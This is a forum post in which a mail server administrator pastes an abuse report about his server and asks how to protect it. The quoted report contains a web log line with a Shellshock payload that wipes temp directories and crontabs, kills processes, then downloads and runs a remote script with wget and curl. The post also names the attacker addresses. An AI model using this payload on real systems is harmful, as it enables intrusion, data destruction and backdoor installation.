Show Posts

Hacking and Security / mail server attack

« on: May 03, 2015, 08:31:16 AM »

I received next message.Please little explain of my problem and what can I do with my mail server (postfix,debian) to protect all? ( I have spamassasin on mail server)

From: chopper boy <choprboy@hotmail.com>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "abuse@xxx.com

Compromised server / Exploit attempts

Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.

Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP -mog servera)

Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif

Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>

5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"

Messages - dendic

Hacking and Security / Re: mail server attack

Hacking and Security / mail server attack